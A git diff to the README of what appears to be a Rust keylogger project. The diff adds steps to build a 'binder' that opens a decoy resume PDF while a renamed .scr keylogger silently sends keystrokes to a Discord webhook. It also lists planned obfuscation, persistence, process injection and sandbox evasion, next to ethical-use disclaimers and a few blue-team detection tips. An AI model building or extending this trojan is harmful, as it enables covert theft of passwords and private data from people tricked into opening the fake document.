diff --git a/README.md b/README.md index 709e927..0ffa6e4 100644 --- a/README.md +++ b/README.md @@ -24,24 +24,6 @@ The project is split into two components: --- -## ๐Ÿ“‚ Project Structure - -Keylogger/ -โ”œโ”€โ”€ src/ -โ”‚ โ”œโ”€โ”€ main.rs # Main keylogger logic -โ”‚ โ””โ”€โ”€ bin/ -โ”‚ โ””โ”€โ”€ binder.rs # PDF + SCR binder -โ”œโ”€โ”€ assets/ -โ”‚ โ”œโ”€โ”€ resume.pdf # Decoy PDF -โ”‚ โ””โ”€โ”€ win_payload.scr # Keylogger executable (renamed) -โ”œโ”€โ”€ config/ -โ”‚ โ””โ”€โ”€ webhook.url # Your Discord webhook URL (plaintext) -โ”œโ”€โ”€ Cargo.toml -โ”œโ”€โ”€ README.md -โ””โ”€โ”€ target/ # Cargo build output - ---- - ## โš™๏ธ Requirements - Rust (latest stable recommended) โ†’ [Install Rust](https://www.rust-lang.org/tools/install) @@ -81,3 +63,85 @@ Rename the resulting file: ```bash mv target/release/keylogger.exe assets/win_payload.scr ``` + +### 4. Compile the Binder Binary + +```bash +cargo build --release --bin binder +``` + +Youโ€™ll get target/release/binder.exe , this is your final payload that runs the decoy and background logger. + +--- + +## ๐Ÿงช Testing Instructions + +1. Use a Virtual Machine or Isolated Environment (NEVER run this on your main OS). + +2. Run binder.exe. The PDF will open as expected. + +3. Meanwhile, the keylogger will silently start, capturing keystrokes and sending logs to your Discord channel. + +4. Every 10 minutes, logs are flushed to the webhook and the local file is cleared. + +--- + +## โ— Ethical Usage Reminder + +This project is a learning tool for red teamers, malware analysts, and ethical hackers to: + +- Understand keylogging mechanisms. + +- Simulate social engineering via file binding. + +- Build stronger blue team detection strategies. + +By using or cloning this project, you agree to use it solely in ethical, permitted environments, such as: + +- Your own systems or VMs + +- Offensive security labs + +- Red team exercises with explicit permission + +--- + +## ๐Ÿ›ก๏ธ Blue Team Mitigation Insights + +This tool demonstrates real-world attacker behavior, which can be detected through: + +- Monitoring abnormal .scr execution + +- Detecting outbound traffic to Discord domains + +- Watching for GetAsyncKeyState or CreateFileA usage + +- Application whitelisting or endpoint behavior analytics (EDR) + +--- + +## ๐Ÿง  Ideas for Future Improvements + +- ๐Ÿ” Encrypt logs before sending. + +- ๐Ÿ“ฆ Use a custom packer to obfuscate binary. + +- ๐Ÿงฌ Add persistence via registry or scheduled tasks. + +- ๐ŸŽญ Use process injection or memory-only execution for stealth. + +- ๐Ÿ—๏ธ Include anti-debugging or sandbox evasion routines. + +--- + +## ๐Ÿ“ข Disclaimer + +This project is intended exclusively for: + +- Red Team education + +- Blue Team defense simulation + +- Malware analysis training + +Any misuse of this tool, including unauthorized deployment, violates the ethical use policy and may be illegal in your country. The author assumes no liability for misuse.